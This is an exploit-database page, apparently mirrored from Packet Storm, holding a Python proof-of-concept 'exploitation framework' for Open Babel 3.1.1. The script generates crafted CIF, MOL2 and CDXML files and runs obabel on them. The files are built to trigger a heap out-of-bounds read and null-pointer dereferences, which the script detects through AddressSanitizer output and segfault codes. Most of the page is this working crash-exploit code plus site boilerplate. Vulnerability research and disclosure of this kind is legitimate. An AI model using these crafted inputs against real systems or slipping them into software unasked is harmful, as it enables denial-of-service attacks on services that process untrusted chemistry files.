Vulners
Lucene search
π OpenBabel 3.1.1 Heap Buffer Overflow
ποΈΒ 09 Mar 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 80Β Views
=============================================================================================================================================
| # Title : OpenBabel 3.1.1 Local Vulnerability Research & Crash Testing Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://openbabel.org/index.html |
=============================================================================================================================================
[+] Summary : This project is a local exploitation research and crash-detection framework designed to evaluate memory-safety weaknesses in Open Babel 3.1.1 under controlled laboratory conditions.
[+] The framework:
Generates specially crafted input files (CIF, MOL2, CDXML).
Executes the target obabel binary with AddressSanitizer (ASAN) enabled.
Detects and classifies memory-related crashes such as:
Heap Buffer Overflow
Segmentation Fault
General ASAN memory violations
[+] POC :
#!/usr/bin/env python3
import subprocess
import os
import sys
import signal
import argparse
import tempfile
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass
from enum import Enum
import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger(__name__)
class VulnerabilityType(Enum):
"""Supported Vulnerability Types"""
HEAP_OOB_READ = "heap_oob_read"
NULL_PTR_MOL2 = "null_ptr_mol2"
NULL_PTR_CDXML = "null_ptr_cdxml"
@dataclass
class ExploitConfig:
"""Exploit Configuration"""
babel_path: str
output_file: str = "NUL" if os.name == "nt" else "/dev/null"
asan_options: str = "symbolize=1:abort_on_error=1:detect_leaks=0:detect_odr_violation=0"
timeout: int = 5
verbose: bool = False
class OpenBabelExploiter:
"""
It is a specialized classifier for Open Babel vulnerability exploitation.
It generates malicious files and tests them against the target binary.
"""
def __init__(self, config: ExploitConfig):
self.config = config
self.env = {}
self.setup_environment()
def setup_environment(self):
"""Securely sets up environment variables"""
self.env = os.environ.copy()
self.env["ASAN_OPTIONS"] = self.config.asan_options
babel_dir = os.path.dirname(os.path.abspath(self.config.babel_path))
lib_dir = os.path.abspath(os.path.join(babel_dir, "..", "lib"))
self.env["BABEL_LIBDIR"] = lib_dir
lib_path_key = "LD_LIBRARY_PATH"
existing_path = self.env.get(lib_path_key)
if existing_path:
self.env[lib_path_key] = f"{existing_path}:{lib_dir}"
else:
self.env[lib_path_key] = lib_dir
def check_binary(self) -> bool:
"""Verifies binary existence and execution permissions"""
target = self.config.babel_path
if not os.path.isfile(target):
logger.error(f"Binary not found or is not a regular file: {target}")
return False
if not os.access(target, os.X_OK):
logger.error(f"Binary does not have execution permissions: {target}")
return False
return True
def generate_mol2_null_ptr(self) -> str:
"""Generates a malicious MOL2 file for NULL Pointer Dereference"""
mol2_content = (
"@<TRIPOS>MOLECULE\n"
"NULL_PTR_EXPLOIT\n"
" 1 0 0 0 0\n"
"SMALL\n"
"USER_CHARGES\n\n"
"@<TRIPOS>ATOM\n"
" 1 C 0.0000 0.0000 0.0000 C.3 1 EXPLOIT 0.0000\n\n"
"@<TRIPOS>BOND\n\n"
"@<TRIPOS>SUBSTRUCTURE\n"
" 1 EXPLOIT 1 TEMP 0 **** **** 0 ROOT\n\n"
"@<TRIPOS>CHARGE\n"
"2 0.5\n"
)
fd, path = tempfile.mkstemp(suffix='.mol2', prefix='exploit_')
with os.fdopen(fd, 'w') as f: f.write(mol2_content)
return path
def generate_cif_heap_oob(self) -> str:
"""Generates a malicious CIF file for Heap OOB Read"""
symops = [f"'{i}*x, {i}*y, {i}*z'" for i in range(1, 21)]
symops_str = '\n'.join(symops)
cif_content = (
"data_EXPLOIT_HEAP_OOB\n"
"_cell_length_a 10.0\n"
"_cell_length_b 10.0\n"
"_cell_length_c 10.0\n"
"_cell_angle_alpha 90.0\n"
"_cell_angle_beta 90.0\n"
"_cell_angle_gamma 90.0\n"
"loop_\n"
"_space_group_symop_operation_xyz\n"
f"{symops_str}\n"
)
fd, path = tempfile.mkstemp(suffix='.cif', prefix='exploit_')
with os.fdopen(fd, 'w') as f: f.write(cif_content)
return path
def generate_cdxml_null_ptr(self) -> str:
"""Generates a malicious CDXML file for NULL Pointer Dereference"""
cdxml_content = (
'<?xml version="1.0" encoding="UTF-8"?>\n'
'<CDXML>\n'
' <page id="1">\n'
' <n id="100" p="100 100" Element="6"/>\n'
' <t p="200 200" id="999">\n'
' <_natom id="99999"/>\n'
' </t>\n'
' </page>\n'
'</CDXML>'
)
fd, path = tempfile.mkstemp(suffix='.cdxml', prefix='exploit_')
with os.fdopen(fd, 'w') as f: f.write(cdxml_content)
return path
def create_payload(self, vuln_type: VulnerabilityType) -> Tuple[str, str]:
"""Creates exploit payload based on vulnerability type"""
if vuln_type == VulnerabilityType.HEAP_OOB_READ: return self.generate_cif_heap_oob(), "cif"
if vuln_type == VulnerabilityType.NULL_PTR_MOL2: return self.generate_mol2_null_ptr(), "mol2"
if vuln_type == VulnerabilityType.NULL_PTR_CDXML: return self.generate_cdxml_null_ptr(), "cdxml"
raise ValueError(f"Unsupported vulnerability type: {vuln_type}")
def execute_exploit(self, file_path: str, file_ext: str) -> Dict:
"""Executes the exploit and analyzes output"""
cmd = [self.config.babel_path, f"-i{file_ext}", file_path, "-osmi", "-O", self.config.output_file]
result = {
"vulnerability_triggered": False,
"crash": False,
"crash_type": "None",
"execution_time": 0,
"return_code": None
}
try:
start_time = time.time()
process = subprocess.run(cmd, env=self.env, capture_output=True, text=True, timeout=self.config.timeout)
result["execution_time"] = time.time() - start_time
result["return_code"] = process.returncode
output = process.stderr + process.stdout
if "ERROR: AddressSanitizer" in output:
result["crash"] = True
result["vulnerability_triggered"] = True
result["crash_type"] = "Heap Buffer Overflow" if "heap-buffer-overflow" in output else "ASAN Error"
elif process.returncode in (-signal.SIGSEGV, 139):
result["crash"] = True
result["vulnerability_triggered"] = True
result["crash_type"] = "Segmentation Fault"
except subprocess.TimeoutExpired:
logger.error("Execution timeout expired.")
except Exception as e:
logger.error(f"Execution error: {e}")
return result
def run_all_exploits(self) -> Dict[str, Dict]:
"""Runs all available exploits sequentially"""
results = {}
for v_type in VulnerabilityType:
logger.info(f"Testing vulnerability: {v_type.name}")
file_path, ext = self.create_payload(v_type)
res = self.execute_exploit(file_path, ext)
results[v_type.value] = res
self.cleanup(file_path)
return results
def cleanup(self, file_path: Optional[str]):
"""Removes temporary payload files"""
if file_path and os.path.exists(file_path):
try:
os.unlink(file_path)
except Exception as e:
logger.warning(f"Failed to delete {file_path}: {e}")
def display_report(results: Dict):
print("\n" + "β"*65)
print(f"{'Vulnerability ID':<20} | {'Status':<15} | {'Crash Detail':<25}")
print("β"*65)
for name, res in results.items():
status = " TRIGGERED" if res["vulnerability_triggered"] else " FAILED"
print(f"{name:<20} | {status:<15} | {res['crash_type']:<25}")
print("β"*65 + "\n")
def print_banner():
banner = """
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Open Babel 3.1.1 - Local Exploitation Framework β
β Vulnerability Research & Testing Tool β
β By indoushka β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
"""
print(banner)
def parse_args():
parser = argparse.ArgumentParser(description="Open Babel Vulnerability Research Framework")
parser.add_argument("-b", "--babel-path", default="./obabel", help="Path to obabel binary")
parser.add_argument("-t", "--target", choices=['cif', 'mol2', 'cdxml', 'all'], default='all', help="Target exploit")
parser.add_argument("-o", "--output", help="Output file (default: /dev/null or NUL)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
return parser.parse_args()
def main():
print_banner()
args = parse_args()
config = ExploitConfig(babel_path=args.babel_path, verbose=args.verbose)
if args.output:
config.output_file = args.output
exploiter = OpenBabelExploiter(config)
if not exploiter.check_binary():
logger.error("Binary check failed. Ensure Open Babel is built with ASAN.")
sys.exit(1)
try:
if args.target == "all":
logger.info("Starting automated exploitation sequence...")
results = exploiter.run_all_exploits()
display_report(results)
else:
v_map = {
"cif": VulnerabilityType.HEAP_OOB_READ,
"mol2": VulnerabilityType.NULL_PTR_MOL2,
"cdxml": VulnerabilityType.NULL_PTR_CDXML
}
v_type = v_map[args.target]
file_path, ext = exploiter.create_payload(v_type)
res = exploiter.execute_exploit(file_path, ext)
exploiter.cleanup(file_path)
display_report({args.target: res})
except KeyboardInterrupt:
logger.info("\nExploit interrupted by user.")
sys.exit(0)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8